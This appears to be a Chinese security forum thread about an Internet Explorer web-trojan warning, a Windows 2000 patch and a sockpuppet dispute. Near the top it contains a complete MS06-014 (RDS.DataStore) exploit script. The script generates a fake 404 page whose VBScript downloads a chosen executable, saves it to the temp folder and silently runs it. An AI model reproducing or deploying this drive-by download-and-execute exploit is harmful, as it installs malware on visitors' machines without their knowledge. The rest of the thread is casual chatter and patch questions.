晕，好像没有2000的这个补丁阿

2000的这个kb911562
在哪里有下？

真没想到是这样子的,此人人品有待提高。

#!/bin/sh -
"exec" "python" "-O" "$0" "$@"

__doc__ = """[BL4CK] - MS06-014

RDS.DataStore - Data Execution
CVS-2006-0003
MS06-014

April 2006

*** this is a bit out-dated, but works very well ***

Usage: ./bl4ck_ms06_014.py http://omfg.what.ho.st/~user/stage2.exe index.html

Now upload index.html to the same webserver hosting your
http://omfg.what.ho.st/~user/stage2.exe

                            - redsand@blacksecurity.org
"""

__version__ = "1.0"

import sys, random

class MS06014:
   
    __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n"

    __html = """
    <title></title>
    <head></head>

    <body>

    <script language="VBScript">

    on error resume next

    BL4CK_PAYLOAD

    </script>
    <head>
    <title>[BL4CK] || 404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    pwn3d!!
    <hr>
    <!-- <script>location.href='http://google.com'</script> -->
    </body>

    </html>

    """

    __payload = """

    ' due to how ajax works, the file MUST be within the same local domain
    dl = "URLFILE"

    ' create adodbstream object
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")

    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1

    ' xml ajax req
    str6="GET"
    x.Open str6, dl, False
    x.Send

    ' Get temp directory and create our destination name
    fname1="bl4ck.com"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2) ' Get tmp folder
    fname1= F.BuildPath(tmp,fname1)
    S.open
    ' open adodb stream and write contents of request to file
    ' like vbs dl+exec code
    S.write x.responseBody
    ' Saves it with CreateOverwrite flag
    S.savetofile fname1,2

    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0

    """

    def        __init__(self, file):

        self.__file = file

    def bl4ck(self):
        self.__payload = self.__payload.replace("URLFILE",self.__file)

        encoded = self.__payload

        ret = self.__html.replace("BL4CK_PAYLOAD",encoded)

        return ret

if __name__ == '__main__':

        url=False
        out=False

        print "[BL4CK] MS06-014 - redsand@blacksecurity.org"
        print "url path to file must be on the same domain as the htm file"
        print "http://blacksecurity.org\r\n"

        argc = len(sys.argv)
        if(argc <= 2):
                print "USAGE: %s <download url> <outfile>" % sys.argv[0]
                sys.exit(0)
        if(argc > 1):
                       url = sys.argv[1]
        if(argc > 2):
                out = sys.argv[2]

        ms = MS06014(url)

               ret = ms.bl4ck()

        try:
            fsock = open(out, "w+", 0)
            try:
                fsock.write(ret );
            finally:
                fsock.close()
        except IOError:
            pass

        print "Wrote %r bytes to: %s" % (len(ret),out)

# milw0rm.com [2006-07-21]

既然开了个头，为什么不把代码贴出来呢

我要拜师学习马甲鉴别技术

据q3说xiaoxinxin是FBI的  

xiaoxinxin

支持你的举报

晕，竟然挖出一个马甲，我佩服

潜水多年，今天开始不潜水了，改过自新，重新灌水！

丢人不说,马甲也丢了.何必跳出来呢,自讨没趣的说

江湖啊

谢谢提醒，当心了！

呵呵  这个东西华夏就流传出来了  

楼主给个火狐邀请码吧  
reski#163.com  先谢了

哎，无话可说。。

不过还是感谢提供。

强烈鄙视散播别人做的木马的，没技术含量。

最初由 fly 发布
据q3说xiaoxinxin是FBI的

FBI现在啊招人？

最初由 dINO 发布
FBI现在啊招人？

苏州？

LZ的“杰作”不少！

第二个骨头C

有钱能使  磨推鬼

最初由 冰雪黑鹰 发布
晕，竟然挖出一个马甲，我佩服

潜水多年，今天开始不潜水了，改过自新，重新灌水！

兄弟，来了啊！多灌水。

楼主在论坛中也算是一个活跃的人,出自一番好意..

最初由 modi 发布
楼主在论坛中也算是一个活跃的人,出自一番好意..

敬佩一下。。。。

主要是是微软的错 做出那么多IE漏洞```被人利用 不过微软官方网站也存在漏洞

感谢楼主的提醒啊

路过的。。。。。。。。。。。
我是怕了网页木马啊， 特别是一些难杀的，搞的我要重装系统，真讨厌哦， 我菜鸟。。。。。。。。。。。。。。一个

看来是少说话,多潜水才好.
失望。